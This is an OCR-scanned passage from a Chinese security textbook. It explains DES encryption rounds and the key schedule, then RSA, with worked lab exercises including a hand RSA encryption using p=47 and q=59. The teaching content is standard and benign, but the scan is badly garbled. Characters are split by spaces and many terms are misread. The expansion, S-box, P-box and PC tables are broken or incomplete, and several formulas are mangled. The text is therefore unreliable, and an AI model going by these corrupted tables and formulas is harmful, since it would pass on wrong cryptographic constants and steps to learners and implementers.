48 位 。 先 将 32 位 分 成 4 位 一 组 , 共 8 组 , 记 作 中 ad aai ydi…di。 再 将 每 组 扩展 成 
6 位 , 共 48 位 , 记 作 中 …… 肌 , 攻 …… 大 ,大 … 大 ,其 扩展 公式 可 以 表示 成 


B=a MH=a © 
WH=al b= a 
式 中 ,下 标 表 示 列 ,上 标 表示 行 , 即 zx 获 。 当 7 一 1 时 ,有 人 负 二 ai,j 二 8 时 有 如 二 al ,这 样 ,就 得 
到 如 图 8-5 所 示 的 变换 表 。 
左边 4 列 被 转换 成 右边 6 列 。 以 右边 第 1 行为 例 ,此 时 j= 二 1, 根 据 @ 有 


WH=ai=32 =al= 
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让。 这- - 沪 玖 E72 
5 6 7 8 -ee A 
9 10 11 12 8 9 10 11 12 13 
13 14 15 16| 扩展 置换 |12 13 14 15 16 17 
17 18 19 20| lle 17 18 19 20 21 
21 22 :23 24 20 21 22 23 24 25 
25 26 27 28 24 25 26 27 28 29 
[29 30 31 32| [28 29 30 31 32 1| 


图 8-5 变换 表 


Bl=a=2 WH=al=3 
六 二 三 六 ; 焙 三 去 看 
将 图 8-5 所 示 的 变换 表 应 用 于 田中 的 R,,R, 二 FOAAFOAA ,将 每 一 个 十 六 进 制 数 写成 
二 进 制 数 ,并 单独 占 一 行 ,经 过 扩展 置换 就 变 成 了 


TE i mm Yl 1 
0 0 0 0 0 11.0 .00 05 1 
A 1 0 1 0 0 L010 1 
A 1 .0 .0 E 0 10 10 1 
FOAAFOAA = 一 -一 一 和 
F 了 1 
0 0 0 0 0 L000 0 1 
A Ld oo 1 0,1 
LAJ 0 ‘0 0 I 9 允 


右 侧 按 行 展开 , 即 0111 1010 0001 0101 0101 0101 0111 1010 0001 0101 0101 0101 ,其 相应 
的 十 六 进 制 数 为 
7A15557A1555 © 
把 扩展 置换 的 结果 与 子 密 钥 进行 异 或 ,16 个 子 密 钥 的 顺序 是 
开 一 天 一 … — Ki 

第 ;次 变换 用 子 密 钥 久 ,。 假 设 子 密 钥 Ki 二 0B02679B49A5, 将 @ 与 K, 逐 位 异 或 运 

算 , 即 
7A15557A1555 @ 0B02679B49A5 = 711732E15CF0 

(2) 压缩 替换 。 

压缩 蔡 换 也 称 压 缩编 码 (compressed encoding) ,通过 压缩 替换 将 输入 的 48 位 变换 为 
32 位 输出 ,其 主要 方法 是 利用 蔡 换 盒 (Substitution box, 简 称 S 盒 )。DES 中 其 他 算法 都 是 
线性 的 ,而 S 盒 是 DES 算法 中 唯一 的 非 线性 部 件 ,不 易于 分 析 ,是 整个 算法 安全 性 的 关键 所 
在 , 它 的 密码 强度 决定 了 整个 密码 算法 的 安全 强度 。S 盒 的 构造 方法 比较 复杂 ,目前 国际 上 
比较 流行 的 构造 方法 是 : 从 理论 上 先 构造 出 一 批 具 有 主要 密码 学 性 质 的 候选 对 象 , 然 后 再 
通过 软件 测试 方法 找 出 满足 要 求 的 S 盒 。 表 8-1 是 DES 算法 使 用 的 S 盒 。 

S 盒 是 指 这 样 的 函数 , 它 把 6 个 输入 位 映射 为 4 个 输出 位 。 其 变换 规则 为 : 取 (0,1， 
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2,…,15) 上 的 4 个 置换 , 即 4X16 矩阵 。 若 给 定 该 S 盒 的 输入 b,610.0301b; ,其 输出 对 应 拢 
阵 的 第 1 行 n 列 的 数 的 二 进 制 表示 。 这 里 : 的 二 进 制 表示 为 5,65;,n 的 二 进 制 表示 为 
,每 个 S 盒 可 用 一 个 4X16 矩阵 或 数 来 表示 。 


表 8-1 S 盒 的 构成 


二 


bibsbab4 ,这 树 
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为 了 说 明 S 盒 如 何 由 6 位 生成 4 位 ,以 Si 为 例 。 如 果 输 入 为 101100, 即 5,516,001b; 二 
101100, 由 此 可 知 bb; 二 10 ,表示 行 数 为 2;b15;53b, 二 0110 ,表示 列 数 为 6。 写 成 
SHO0110Y 三 IC6%》,。 村 SS 鲍 表 , (256) 三 2 @) 
整个 压缩 替换 可 用 图 8-6 表示 。 
前 面 的 例子 经 子 过 程 1 后 ,得 711732E15CF0, 共 48 位 二 进 制 数 ,分 成 8 个 6 位 一 组 的 
。 237 。 


6 位 | [6 位 | [6 位 | [6 位 | [6 位 | [6 位 | [6 位 |] [6 位 
sS | [sa | [ls] [ls ss| [se] [LS | Ls 
14|4|1414|4|4|4|4 


图 8-6 压缩 替换 (4 表示 4 位 ) 


二 进 制 ,如 下 : 


011100,010001,011100,110010,111000,010101,110011,110000 


按 类 似 @ 的 算法 ,经 压缩 替换 ,最 后 转换 为 十 六 进 制 : 
Soill0》 三 SG 三 0 
(i000 ,S.C 
Si"(1110) = S3(14) = 2 
SPCIOO0LY = :S97 = 1 
Si"(1100) = S$(12)= 6 
S21(1010) = Si:(10) = D 
SH(1001) = S;(9)=5 
SHC1000》 = SC8) = 0 


经 压缩 替换 后 ,其 结果 的 十 六 进 制 数 为 0C216D50。 


(3) P 排列 。 


P 排列 也 称 换 位 表 变 换 , 将 压缩 替换 后 得 到 的 32 位 二 进 制 数 按 下 面 的 顺序 重新 排列 ， 


即 密码 函数 : 
nl6 


L22 


13 
了 


20 211] 
28 17 


4 25J 


P 排列 使 得 一 个 S 盒 的 输出 对 下 一 轮 多 个 S 盒 产 生 影 响 ,形成 所 谓 雪崩 效 应 ,其 表现 是 


明文 或 密 钥 的 一 点 小 的 变动 都 会 引起 密 文 的 较 大 变化 。 
在 (2) 中 ,经 压缩 蔡 换 后 的 十 六 进 制 数 为 0C216D50, 其 二 进 制 数 是 
0000 1100 0010 0001 0110 1101 0101 0000 


@ 


然后 进行 P 排列 。 例 如 四 中 ,第 16 位 是 1, 第 7 位 是 0, 第 20 位 是 0, 第 21 位 是 1, 余 类 推 。 
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结果 如 下 : 


r0 0 0 0 业 ， 人 本 
和 下 你 区 9 了 0 
0 0 1 0 0 0 0 1 
0 0 0 1|P 排 列 |1 1 0 0 
0C216D50 = 人 = 921C209C 
和 1 1 1 
1 用 0 0 0 0 
0 1 0 下 0 1 
I0 0 0 0 1 1 .0 


因而 f(Ro, Ki)=921C209C。 
由 @, 有 
L 四 f(R,,K1) = CCOOCCFF @® 921C209C = 5E1CEC63 = R, 
Li = R, = FOAAFOAA 
得 到 Li ,Ri 后 ,再 重复 上 述 乘积 变换 ( 共 16 次 ) ,得 Lis、Ris ,组 成 64 位 。 
步骤 3: 最 终 排列 。 
最 终 排列 是 初始 排列 的 逆 变 换 , 即 (IP)“! ,其 排列 顺序 如 下 所 示 : 


rd40 8 48 16 56 24 64 32] 
39 7 4 15 55 23 ‘63 .31 
38 6 46 14 54 22 62 30 
cp) 于 二 37 5 45 13 53 21 61 29 
36 4 44 12 52 20 60 28 
35 3 43 11 51 19 59 27 
34 2 42 10 50 18 58 26 
133. LL 4 9 9 57 253 


联合 RLis, 共 64 位 ,经 (IP) “!' 操 作 后 就 能 得 到 该 组 的 密 文 。 

1) DES 算法 密 钥 的 生成 过 程 

密 钥 是 在 明文 转换 为 密 文 或 将 密 文 转换 为 明文 的 算法 中 输入 的 数据 。 从 DES 算法 流 
程 可 以 看 出 ,整个 DES 加 密 过 程 需要 16 个 密 钥 (K,,K,,…, K's) 参与 运算 ,才能 完整 地 将 
明文 输入 块 变换 为 密 文 输出 块 。 

在 DES 迭代 加 密 过 程 中 ,使 用 的 16 个 密 钥 (48 位 ) 均 来 自 一 个 64 位 的 种 子 密 钥 。 该 种 
子 密 钥 共有 64 位 ,其 中 每 个 字 节 的 第 8 位 作为 奇偶 校 验 ( 即 第 8、16、24、32、40、48、56、64 位 
是 校 验 位 ,使 得 每 个 密 钥 都 有 奇数 个 1) 。 

其 具体 过 程 是 : 64 位 种 子 密 钥 首先 根据 如 图 8-7 所 示 的 置换 选择 矩阵 PC 
(Permutation Choose, 排 列 选择 ) 进 行 置换 (即将 数码 中 的 某 一 位 的 值 根据 置换 表 的 规定 用 
另 一 位 代替 ), 从 而 奇偶 校 验 位 被 删除 , 仅 保 留 有 效 密 钥 位 ,得 到 56 位 的 选择 矩阵 ;然后 在 
DES 的 16 轮 密 钥 变换 生成 过 程 中 ,每 一 轮 都 将 一 个 56 位 的 密 钥 分 成 左右 各 28 位 的 两 部 分 
(以 C, 和 DD。 表示 )。 再 根据 轮 数 循环 左 移 表 (第 1、2、9、16 轮 左 移 1 位 ,其 余 轮 次 左 移 2 位 ， 
见 表 8-2) 分 别 左 移 后 ,得 到 C, 、.D, ,合并 左右 两 部 分 ,再 经 过 排列 选择 PCs( 见 图 8-8) 将 56 
位 密 钥 压缩 成 48 位 密 钥 Ki ;对 Ci 、D, 作 循 环 左 移 位 后 得 到 C;、D; ,经 过 PC* 得 到 子 密 钥 
K, ;…… 直 到 产生 子 密 钥 Kis 。 完 整 的 算法 过 程 如 图 8-9 所 示 。 
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14 17 11 

: 上 

< -i 设 

16 "27 

41 52 31 

30 40 51 

44 49 39 

L46 42 50 

图 8-8” 密 钥 置 
初始 密 钥 K(64 位 ) 
去 掉 校 验 位 (56 位 ) 

PC 


36 
换 选 择 和 矩阵 PC 


57 49 33 25 17 ‘9 1 38 50 4 

10 2 Sl ‘43 35 327" 19. ll ‘3: .60 

63 55 39 31 23 15 7 62 54 46 

14 6 5 45 ‘37 29 21 13 5 28 
图 8-7 密 钥 置换 选择 矩阵 PC 

表 8-2 轮 数 循环 左 移 表 
世 | 3 7|8|9|1 
和 | 2 国医 到 医 : 


Co(28 位 ) Do(28 位 ) 
1 
LS LS 
1 
Ci(28 位 ) Di(28 位 ) 
1 PC, 
LS; LS; 
1 
C2(28 位 ) D,(28 位 ) 
F PC)， 
LS LSie 
| 
Cie(28 位 ) Die(28 位 ) 
PC 


8-9 密 钥 生成 过 程 


其 中 LS; 表示 第 i 次 循环 左 移 的 位 数 。 初 始 密 钥 K 去 掉 第 8、16、24、32、40、48、56、64 
位 后 余下 56 位 ,对 这 56 位 通过 PC 作 重 新 排列 ,确定 Cv 的 顺序 如 下 : 
r57 49 41 33 25 17 9] 

1 58 50 42 34 26 18 
10 2 59 51 43 35 27 
Li9 11 3 60 52 44 36j] 
确定 D。 的 顺序 如 下 : 
r63 55 47 39 31 23 157 

7 62 54 46 38 30 22 
14 6 61 53 45 37 29 
[0 刘 
其 中 的 顺序 号 均 指 初始 密 钥 KK 的 位 置 标号 。 

由 C;、D; 经 循环 左 移 位 后 得 到 CD- ,为 了 保证 经 16 次 移 位 后 能 恰好 循环 移动 
28 位 ,使 Ci 二 Co 、D1is 三 Du , 故 各 次 的 移 位 数 不 全 相等 ,具体 的 移 位 数 LS; 在 表 8-3 中 给 出 。 
为 了 更 清楚 地 说 明 密 钥 的 生成 过 程 , 把 经 PC, 处 理 后 得 到 的 C,、D, 经 LS, 次 循环 左 移 
后 的 CD ,经 LS, 次 循环 左 移 后 的 C,、D, ,经 LS; 次 循环 左 移 后 的 C,、D; 的 情况 列 在 
表 8-3 中 ,在 分 为 4 段 的 表 中 ,每 段 的 第 1 行 表 示 C、D 的 位 标 ,每 段 的 第 2 一 4 行 的 数 都 是 
初始 密 钥 K 中 的 位 标 ,其 对 应 的 初始 密 钥 玉 中 的 值 只 能 是 0 或 1。 
表 8-3 CD, 变化 表 


C 位 标 1 2 3 4 5 6 8 9 10 11 12 13 14 
Co 57 49 41 33 25 17 9 1 58 50 42 34 26 18 
C 49 41 33 25 17 9 上 58 50 42 34 26 18 10 
C 41 33 25 17 9 1 58 50 42 34 26 18 10 2 
Ca 25 17 9 1 58 50 42 34 26 18 10 2 59 51 


Cs 43 35 27 19 11 3 60 52 44 36 57 49 41 33 


DD 位 标 | 29 30 31 32 33 34 35 36 37 38 39 40 41 42 


D, 63 55 47 39 31 23 15 7 62 54 46 38 30 22 
Di 55 47 39 31 23 15 62 54 46 38 30 22 14 
D; 47 39 31 23 15 要 62 54 46 38 30 22 14 6 


D; 31 23 15 7 62 54 46 38 30 22 14 6 61 53 
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D 位 标 | 43 44 45 46 47 48 49 50 51 52 53 54 55 56 


D, 14 6 61 53 45 37 29 21 13 5 28 20 12 4 


D 6 61 53 45 37 29 21 13 5 28 20 12 4 63 


D; 61 53 45 37 29 21 13 5 28 20 12 4 63 55 


D; 45 37 29 21 13 28 20 12 4 63 55 47 39 


a 


图 8-9 中 的 PC, 是 从 56 位 (C;,D;) 中 重新 排列 选择 出 48 位 的 子 集 ,该 子 集 就 是 初始 密 
钥 K 的 子 密 钥 K;,PC; 的 置换 表 如 表 8-4 所 示 。 


表 8-4 位 标 对 应 表 


Ki 的 位 标 | 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 


PC; 14|17|11 24 5 3 28 15 6 21 10 23 19 12 4 
天 10|51|34 60 49 17 33 57 2 9 19 42 3 35 26 25 
天 > 2|43|26 52 41 9 25 49 59 1 ll 34 60 27 18 17 
K; 51 | 27|10 36 25 58 9 33 43 50 60 18 44 11 2 1 


PC 26 8 | 16 7 27 20 13 2 41 52 31 37 47 55 30 40 
Ki 44 | 58 | 59 让 36 27 18 41 22 28 39 54 37 4 47 30 
K;, 36 |50|51 58 57 19 10 33 14 20 31 46 29 63 39 32 
K; 49 | 34 35 42 41 3 59 17 61 1 15 30 -13 47 23 6 


Ki 的 位 标 | 33 | 34 | 35 36 37 38 39 40 41 42 43 44 4 46 47 48 


PC 51 | 45 | 33 48 44 49 39 56 34 53 46 42 50 36 29 32 
Ki 5|153|23 29 61 21 38 63 15 20 45 14 13 62 55 31 
K; 28 | 45 | 15 21 53 18 30 55 7 12 37 6 5 54 47 23 
K; 12 | 29 | 62 5 37 28 14 39 54 63 21 53 20 38 31 


表 中 的 数值 是 C、D 的 位 标 。 对 C;、D; 通过 PC, 处 理 就 产生 K;( 去 掉 C;、D; 的 第 9、18、 
22、25、35、38、43、54 位 后 的 重新 排列 )。 为 了 使 K; 与 初始 密 钥 KK 的 位 标 相 对 应 , 表 8-4 给 
出 KK Ka 与 CD; 的 位 标 及 开 的 位 标的 对 应 表 。 其 中 ,第 1 行 是 K; 的 位 标 ,为 1 一 
48; 第 2 行 是 PC, 的 选择 ,其 数值 是 C;、D; 的 位 标 ,为 1 一 56; 第 3 行 开始 的 数值 是 初始 密 钥 
K 中 的 位 标 , 为 1 一 63。 子 密 钥 K; 的 最 后 值 只 是 由 0 和 1 组 成 的 一 个 48 位 的 二 进 制 序列 。 
类 似 地 ,也 有 天 ,一 Ku 与 CD; 的 位 标 及 KK 的 位 标的 对 应 关系 。 

由 主 密 钥 K 产生 密 钥 氏 , 一 Ki 的 全 过 程 也 可 以 用 图 8-10 来 表示 。 

例如 , 密 钥 K(64 位 ) 的 值 如 下 : 

K= 01110000 00111000 10011011 11101100 01110110 10010010 10000101 11011011 
其 中 有 下 划 线 的 位 是 奇偶 校 验 位 。 去 掉 校 验 位 ( 即 第 8、16、24、32、40、48、56、64 位 ,这 8 位 
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开始 


取 初始 密 钥 K(64 位 ) | 一 | 。 去掉 校 验 位 的 x ”| (56 位 ) 


通过 PCI 产 生 Cu、Du | (各 28 位 ) 


机 


| 


CiiDi! 循 环 左 移 LS; 
位 产生 CiDi 


通过 PC, 产 生子 密 钥 K; 


< tli 
~| ”结束 


图 8-10 由 主 密 钥 K 产生 密 钥 Ki 一 Ke 的 全 过 程 


对 加 密 过 程 没 有 影响 ) 后 经 过 PC, 选择 得 C,、D, (56 位 ) ,分 别 为 
C, = 11101100 10011001 00011011 1011 
D, = 10110100 01011000 10001110 0110 
循环 左 移 LS (=1) 位 后 得 Ci 、D: 
Ci = 11011001 00110010 00110111 0111 
D, = 01101000 10110001 00011100 1101 
C1 、D 经 PC, 选择 后 得 K1(48 位 ) 如 下 : 
天; = 00111101 10001111 11001101 00110111 00111111 00000110 
其 十 六 进 制 形式 K, = 二 3D8FCD373F06。 
因为 K; 是 由 主 密 钥 通过 一 些 指 定 的 移 位 、 排 列 选择 得 到 的 ,因此 只 要 对 用 户 给 出 主 密 
钥 即 可 。 
2) 解密 运算 
DES 解密 结构 与 其 加 密 结构 是 对 称 的 ,这 主要 是 由 于 模 2 加 法 的 特性 和 最 终 排列 与 初 
始 排列 的 可 逆 性 。 解 密 运 算 与 加 密 运 算 一 样 , 只 是 所 取 子 密 钥 的 次 序 相反 。 加 密 时 候 的 顺 
序 是 
KK > KR 


解密 时 的 顺序 则 为 

Ki > Kis—-…—K 
各 轮 产生 密 钥 的 算法 也 是 循环 的 。 密 钥 向 右 移动 ,每 次 移动 位 数 是 0、1、2、2、2、2、2、2、1、2、 
2 .22 B01, 


虽然 DES 算法 如 此 复杂 ,但 它 基 本 上 还 是 采用 一 个 64 位 字符 的 单字 母 表 替 换 密码 。 
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当 明 文 是 64 个 0 并 且 密 钥 是 56 个 0 时 ,利用 DES 算法 所 得 的 密 文 的 十 六 进 制 将 
是 8CA64DE9C1B123A7。 
DES 开创 了 算法 全 部 公开 的 先例 。 其 主要 缺点 是 : 密 钥 长 度 (56 位 ) 不 够 长 ,和 欠 代 次 数 
(16 次 ) 不 够 多 。 
【实验 思考 】 
(1) DES 的 雪崩 效应 是 指明 文 (或 密 钥 ) 的 一 个 二 进 制 位 的 变化 会 引起 密 文 许多 位 的 改 
。 请 根据 下 列 两 个 结论 进行 验证 。 
Q@ 用 同样 密 钥 加 密 只 有 一 位 不 同 的 两 个 明文 ,例如 下 面 两 个 明文 : 
000000000000000…00000000 
100000000000000:…00000000 
结论 : 3 次 循环 后 密 文 有 21 个 位 不 同 ,16 次 循环 后 有 34 个 位 不 同 。 
@ 用 只 有 一 位 不 同 的 两 个 密 钥 加 密 同样 的 明文 ,例如 下 面 两 个 密 钥 : 
000000000000000…00000000 
100000000000000…00000000 
结论 : 3 次 循环 后 密 文 有 14 个 位 不 同 ,16 次 循环 后 有 35 个 位 不 同 。 
(2) 讨论 : 如 何 破解 DES 密 钥 ? 


8.4 非 对 称 加 密 技 术 RSA 


非 对 称 加 密 算法 是 一 种 密 钥 交换 协议 ,允许 在 不 安全 的 媒体 上 通信 的 双方 交换 信息 , 安 
全 地 达成 一 致 的 密 钥 ,这 就 是 “公开 密 钥 系统 ”。 与 对 称 加 密 算法 不 同 , 非 对 称 加 密 算法 需要 
两 个 密 钥 : 公开 密 钥 (public key) 和 私有 密 钥 (private key) 。 公 开 密 钥 与 私有 密 钥 是 一 对 ， 
如 果 用 公开 密 钥 对 数据 进行 加 密 , 只 有 用 对 应 的 私有 密 钥 才 能 解密 ;如 果 用 私有 密 钥 对 数据 
进行 加 密 ,那么 只 有 用 对 应 的 公开 密 钥 才能 解密 。 因 为 加 密 和 解密 使 用 的 是 两 个 不 同 的 密 
钥 , 所 以 这 种 算法 叫 作 非 对 称 加 密 算 法 。 非 对 称 加 密 算 法 包括 RSA 背包 密码 .McEliece 
密码 、Rabin、 椭 圆 曲 线 .EIGamal、DH 等 。 

在 非 对 称 加 密 算法 中 ,RSA 加 密 算法 享誉 全 球 。 它 是 现今 使 用 最 广泛 的 公 钥 密码 体 
制 ,也 是 公 钥 密码 的 国际 标准 。 

1. RSA 算法 

RSA 的 安全 性 是 基于 大 数 分 解 的 难度 。 其 公 钥 和 私 钥 是 一 对 大 素数 (100 一 200 位 十 
进 制 数 或 更 大 ) 的 函数 。 从 一 个 公 钥 和 密 文 恢复 出 明文 的 难度 ,等 价 于 分 解 两 个 大 素数 之 积 
(这 是 公认 的 数学 难题 )。 由 于 进行 的 都 是 大 数 计算 ,使 得 RSA 最 快 的 情况 也 比 DES 慢 上 
数 倍 ,所 以 无 论 是 软件 还 是 硬件 实现 ,速度 一 直 是 RSA 的 缺陷 。 在 实际 应 用 中 ,通常 加 密 中 
并 不 是 直接 使 用 RSA 来 对 所 有 的 信息 进行 加 密 。 最 常见 的 情况 是 随机 产生 一 个 对 称 加 密 
的 密 钥 ,然后 使 用 对 称 加 密 算法 对 信息 加 密 , 而 加 密 密 钥 则 用 RSA 进行 加 密 。 

RSA 算法 描述 如 下 : 

(1) 选择 一 对 不 同 的 .足够 大 的 素数 p、gq。 

(2) 计算 n= pq。 

(3) 计算 Fo) 一 (一 1)(Cq 一 1) ,同时 对 p、gq 严 加 保密 。 
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(4) 找 一 个 与 f(n) 互 质 的 数 e, 有 征 1<e<f(m)。 

(5) 计算 d, 使 得 de 二 1 mod f(n)。 式 中 二 是 数论 中 表示 同 余 的 符号 。 二 符号 的 左边 
必须 和 右边 同 余 , 也 就 是 两 边 模 运算 结果 相同 。 显 而 易 见 .不管 f/(n) 取 什么 值 ,符号 右边 1 
mod f(n) 的 结果 都 等 于 1; 符 号 的 左边 4 与 e 的 乘积 做 模 运 算 后 的 结果 也 必须 等 于 1。 这 就 
需要 计算 出 a 的 值 ,使 这 个 同 余 等 式 能 够 成 立 。 

(6) 公 钥 KU==(e,n), 私 钥 KR=(d,n)。 

(7) 加 密 时 , 先 将 明文 变换 成 0 至 "一 1 的 一 个 整数 M。 若 明文 较 长 ,可 先 分 割 成 适当 
的 组 ,然后 再 进行 交换 。 设 密 文 为 C, 则 加 密 过 程 为 C 三 M* mod n。 

(8) 解密 过 程 为 M=C mod n。 

模 运算 是 整数 运算 ,有 一 个 整数 mw, 以 n 为 模 做 模 运 算 , 即 mx mod n。 实 际 上 是 让 m 去 
被 n 整除 , 取 所 得 的 余数 作为 结果 。 例 如 ,10 mod 3=1,26 mod 6 二 2,28 mod 2 二 0。 

RSA 的 公 钥 、 私 钥 的 组 成 以 及 加 密 、 解 密 的 公式 如 表 8-5 所 示 。 


表 8-5 RSA 的 公 钥 、 私 钥 和 加 密 、 解 密 公 式 


公 钥 KU 和 49 必须 保密 ) 
私 钥 KR si 1 mod((p—1)(g—1)) 

加 密 C=M’ mod n 

解密 M=C’ mod n 


RSA 算法 既 能 用 于 数据 加 密 , 也 能 用 于 数字 签名 。RSA 算法 的 优点 是 密 钥 空间 大 , 缺 
点 是 加 密 速 度 慢 ,如 果 RSA 和 DES 结合 使 用 , 则 正好 弥补 RSA 的 缺点 。 即 DES 用 于 明文 
加 密 ,RSA 用 于 DES 密 钥 的 加 密 。 由 于 DES 加 密 速度 快 ,适合 加 密 较 长 的 报 文 ;而 RSA 可 
解决 DES 密 钥 分 配 的 问题 。 

2. RSA 算法 的 分 析 

RSA 是 基于 整数 因子 分 解 的 密码 体制 ,其 安全 性 完全 信赖 于 因子 分 解 的 困难 性 。 只 要 
1 一 旋 Xdg 被 因子 分 解 , 则 RSA 便 被 破解 ,因而 在 RSA 系统 中 如 何 选 取 大 的 素数 pg 才 是 关 
键 所 在 。 

RSA 中 的 素数 都 是 十 进 制 数 , 针 对 素数 户 和 4 的 选择 ,RSA 发 明 人 建议 对 素数 p 和 g 
的 选择 应 当 满足 以 下 要 求 ， 

(1) pq 要 足够 大 ,其 十 进 制 位 数 应 该 不 小 于 100, 在 长 度 上 应 相差 几 位 , 且 二 者 之 差 与 
pnq 位 数 相近 。 

(2) p 一 1 与 gq 一 1 的 最 大 公约 数 gcd(p 一 1,9 一 1) 尽 量 小 。 

(3) p 一 1 与 gq 一 1 均 应 至 少 含有 一 个 大 的 素数 因子 。 

满足 这 些 条 件 的 素数 称 为 安全 素数 。 

RSA 算法 本 身 的 脆弱 性 及 其 存在 的 问题 如 下 : 

(1) RSA 公 钥 密码 体制 在 加 密 或 解密 变化 中 涉及 大 量 的 数值 计算 ,其 加 密 和 解密 的 运 
算 时 间 比 较 长 ,这 比 数据 加 密 标准 DES 的 计算 量 开 销 大 ,在 一 定 程度 上 限制 了 它 的 应 用 范 
围 ,以 至 于 实际 使 用 RSA 密码 体制 时 无 法 用 软件 产品 ,必须 用 超大 规模 集成 电路 的 硬件 产 
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品 。RSA 加 密 解 密 的 速度 在 目前 的 加 密 解 密 算法 中 是 最 慢 的 。 

(2) 虽然 提高 n 二 PXg 的 位 数 会 大 大 提高 RSA 密码 体制 的 安全 性 ,但 其 计算 量 呈 指数 
增长 ,以 致 其 实现 的 难度 增 大 ,实用 性 降低 。 

(3) RSA 公 钥 密码 体制 的 算法 完整 性 ( 指 密 钥 控制 加 密 或 解密 变换 的 唯一 性 ) 和 安全 
性 ( 指 密码 算法 除 密 钥 本 身 外 ,不 应 该 存在 其 他 可 破译 密码 体制 的 可 能 性 ) 有 待 进一步 完善 。 

(4) 到 目前 为 止 ,还 没有 任何 可 靠 的 攻击 RSA 算法 的 方式 。 只 有 短 的 RSA 密 钥 才 可 
能 被 强力 方式 解 破 。 如 果 密 钥 的 长 度 足 够 长 ,用 RSA 加 密 的 信息 实际 上 是 不 能 被 解 破 的 。 
但 随 着 数学 方法 的 进步 和 计算 机 技术 的 飞速 发 展 ,RSA 算法 面临 破译 能 力 日 益 增 强 的 严重 
挑战 ,因子 分 解 问题 的 求解 已 经 有 了 长 足 的 发 展 。 继 1995 年 成 功 地 分 解 了 128 位 十 进 制 数 
RSA 密码 算法 ,2009 年 12 月 又 有 人 分 解 了 768 位 RSA 算法 。1024 位 所 需 时 间 是 768 位 
的 一 千 多 倍 , 因 此 在 短 时 间 内 1024 位 (相当 于 300 位 十 进 制 数字 ) 是 安全 的 ,但 研究 表明 
1024 位 密 钥 预计 将 会 在 10 年 内 被 攻破 ,因此 未 来 数 年 应 逐步 淘汰 1024 位 RSA 密 钥 。 因 
为 分 解 1024 位 密 钥 只 是 一 个 时 间 问 题 。 

尽管 如 此 ,RSA 公开 密 钥 密码 算法 在 信息 交换 过 程 中 使 用 得 比较 广泛 , 既 可 用 于 加 密 ， 
又 可 用 于 签名 ,并 能 为 公开 密 钥 签发 公 钥 证 书 、 发 放 证 书 、 管 理 证 书 等 ,安全 性 还 是 比较 高 
的 。 以 当前 的 计算 机 水 平 , 如 选择 2048 位 长 的 密 钥 ( 相 当 于 610 位 十 进 制 数字 ) 应 该 认为 是 
无 法 攻破 的 。 

3. RSA 算法 实例 

实验 8-2 RSA 手工 算法 

【实验 目的 】 

掌握 RSA 加 密 算法 的 加 /解密 过 程 。 

【实验 原理 】 

RSA 加 密 算法 是 一 种 非 对 称 加 密 算法 ,在 公 钥 加 密 标准 和 电子 商业 中 RSA 被 广泛 使 
日 。 其 算法 表述 如 下 : 

(1) 求 素数 p 和 g。 

(2) 求 公 钥 (e,n): e 与 y(n)= 二 (p 一 1)(g 一 1) 互 质 。 

(3) 求 私 钥 (d,n): dXe 二 1 mod ((p 一 1)(g 一 1))。 

(4) 加 密 过 程 : C 王 Me mod n。 

(5) 解密 过 程 : M==C” mod n。 

RSA 简洁 幽雅 ,其 算法 的 可 靠 性 基于 大 数 分 解 的 难度 。 假 如 能 找到 一 种 很 快 地 分 解 因 
子 的 算法 ,那么 用 RSA 加 密 的 信息 的 可 靠 性 就 肯定 会 急剧 下 降 。 但 找到 这 样 的 算法 的 可 能 
性 非常 小 。 目 前 还 没有 任何 可 靠 的 攻击 RSA 算法 的 方式 ,只 有 短 的 RSA 密 钥 才 可 能 被 强 
力 方式 破解 。 只 要 其 密 钥 的 长 度 足 够 长 (需要 达到 2048 位 ), 用 RSA 加 密 的 信息 是 安全 的 。 

【实验 要 求 】 

按照 RSA 算法 原理 , 设 定 p= 二 47,g 二 59, 手 工 对 明文 “ITS ALL GREEK TO ME” 进 行 
加 、 解 密 运 算 。 

【实验 过 程 】 

(1) 设计 公私 密 钥 (e,z) 和 (CC ,7z) 。 

由 于 给 定 p 二 47,g 二 59, 则 
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n=pXg= 47X59= 2773 
f= (p—1)(g—1) 一 46X58 一 2668 

取 e=17, 能 满足 1 二 e 二 f(x), 即 1 二 17 二 2668, 并 且 e 入 (2) 互 素 。 一 般 通过 试 算得 
到 e 值 。 至 于 d, 因 有 2668= 二 157X17 一 1, 故 d=157。 

可 以 验证 eXd 寺 1 mod f() 同 余 等 式 成 立 。 所 以 ,一 对 公私 密 钥 为 

。 公 钥 ( 加 密 密 钥 ): KU= (17,2773)。 

。 私 钥 (解密 密 钥 ): KR= (157,2773)。 

(2) 明文 数字 化 。 

将 明文 信息 数字 化 ,并 将 每 块 两 个 数字 分 组 。 假 定 明文 英文 字母 编码 表 为 按 字母 顺序 
排列 数值 ,如 表 8-6 所 示 。00 表示 空格 。 


表 8-6 明文 英文 字母 编码 表 


字母 码 值 字母 码 什 字母 码 值 
01 G 19 25 
02 H 20 名 26 
tC 03 I 21 
D 04 J 22 
E 05 K 23 
F 06 I 24 


将 明文 串 “ITS ALL GREEK TO ME” 按 表 8-6 数字 化 ,分 组 后 得 
0920 1900 0112 1200 0718 0505 1100 2015 0013 0500 

(3) 明文 加 密 。 

明文 加 密 时 涉及 “ 短 模 运算 ”。 

短 模 运算 是 RSA 算法 中 的 关键 ,无 论 是 素数 测试 ,还 是 加 密 和 解密 ,都 要 用 到 寡 模 运 
算 。 答 模 运 算 就 是 计算 诸如 N* mod D 形式 的 值 。 当 尺 很 大 时 ,将 导致 巨大 的 计算 量 。 对 
于 计算 机 而 言 ,由 于 N 和 R 都 很 大 ,N" 的 值 在 运算 时 将 会 非常 浪费 存储 空间 ,并 使 计算 变 
得 非常 缓慢 而 难以 实现 。 

一 般 寡 模 运 算 可 通过 积 模 分 解 的 方法 来 处 理 , 因 此 N* mod DD 的 转换 形式 是 

N*modD= (NmodD)*modD 

这 样 ,在 运算 (N mod D)* mod D 的 过 程 中 , 它 最 多 执行 2log:R 次 乘法 和 除法 ,从 而 使 计算 
量 大 为 减少 ,提高 了 运算 速度 。 

用 加 密 密 钥 (17,2773) 将 数字 化 明文 分 组 信息 加 密 成 密 文 。 由 C 三 M* mod ,并 使 用 寡 
模 运 算 的 转换 形式 对 第 1 组 数据 0920 计算 如 下 : 

0920 = 920' mod 2773 = ((((920 mod 2773)2)2)2)2 Xx 920 mod 2773 = 948 mod 2773 
这 样 ,0920 的 密 文 是 948。 类 似 地 ,可 以 计算 出 其 他 组 的 密 文 。 整 个 明文 串 加 密 后 的 密 文 是 
0948 2342 1084 1444 2663 2390 0778 0774 0219 1655 

